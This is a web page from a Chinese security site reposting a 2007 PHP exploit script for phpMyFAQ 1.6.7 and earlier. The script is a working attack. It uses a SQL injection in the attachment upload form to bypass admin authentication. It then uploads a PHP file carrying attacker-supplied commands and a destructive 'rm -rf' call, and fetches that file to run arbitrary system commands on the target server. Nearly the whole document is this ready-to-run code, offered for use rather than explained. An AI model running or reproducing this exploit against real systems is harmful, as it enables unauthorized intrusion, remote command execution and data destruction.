首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpMyFAQ <= 1.6.7 Remote SQL Injection / Command Execution Exploit
来源:elgCrew@safe-mail.net 作者:elgCrew 发布时间:2007-03-02  
#!/usr/bin/php5-cgi -q
<?

/*
Sql injection / remote command execution exploit for phpmyfaq < 1.6.8

Bugtraq:
http://www.securityfocus.com/bid/21944

CVS:
http://thinkforge.org/plugins/scmcvs/cvsweb.php/phpmyfaq/admin/attachment.php.diff?r1=1.7.2.11.2.5;r2=1.7.2.11.2.6;cvsroot=phpmyfaq;f=h

./pmf.php http://xxxx.xxxx.edu/faq/ "<? system('id'); ?>" localhost:4001

elgCrew@safe-mail.net
*/

function do_upload($baseurl, $proxy, $cmd)
{

$fp = fopen("kebab.php", "w");
if(!$fp)
die("Cannot open file for writing");

$code = "Un1q" . $cmd . "<? system(\"rm -rf ../1337/\"); ?>";
fwrite($fp, $code);
fclose($fp);

$sendvars["aktion"] = "save";
        $sendvars["uin"] = "-1' UNION SELECT char(0x61,0x64,0x6d,0x69,0x6e),char(0x61,0x61,0x27,0x20,0x4f,0x52,0x20,0x31,0x3d,0x31,0x20,0x2f,0x2a) /*";
        $sendvars["save"] = "TRUE";
        $sendvars["MAX_FILE_SIZE"] = "100000";
        $sendvars["id"] = "1337";
        $sendvars["userfile"] = '@kebab.php';
        $sendvars["filename"] = "kebab.php";

        $posturl = $baseurl . "/admin/attachment.php";
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $posturl);

        curl_setopt($ch, CURLOPT_PROXY, $proxy);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);

        curl_setopt($ch, CURLOPT_POSTFIELDS, $sendvars);
        echo "=> Uploading file.\n";
        $result = curl_exec($ch);
curl_close($ch);
@unlink("kebab.php");
$get =  $baseurl . "/attachments/1337/kebab.php\n";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $get);
curl_setopt($ch, CURLOPT_PROXY, $proxy);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
if(strstr($result, "Un1q"))
echo substr($result, 4);
else
echo "Not vulnerable / error ?\n";
curl_close($ch);


}

if($argc < 3)
{
printf("Usage: %s http://test.com/phpmyfaq/ \"<? system('uname -a'); ?> \" [proxy]\n", $argv[0]);
exit(0);
}
if($argc == 4)
$proxy = $argv[3];
else
$proxy = "";

do_upload($argv[1], $proxy, $argv[2]);

?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DivX Web Player 1.3.0 (npdivx3
·PHP 4 Userland ZVAL Reference
·Snort 2.6.1 DCE/RPC Preprocess
·WebMod 0.48 (Content-Length) R
·madwifi <= 0.9.2.1 WPA/RSN IE
·Asterisk <= 1.2.15 / 1.4.0 pre
·3Com TFTP Service <= 2.0.1 (Lo
·AJ Auction Pro All Versions (s
·vBulletin <= 3.6.4 (inlinemod.
·AJDating 1.0 (view_profile.php
·McAfee VirusScan for Mac (Vire
·AJ Forum 1.0 (topic_title.php)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved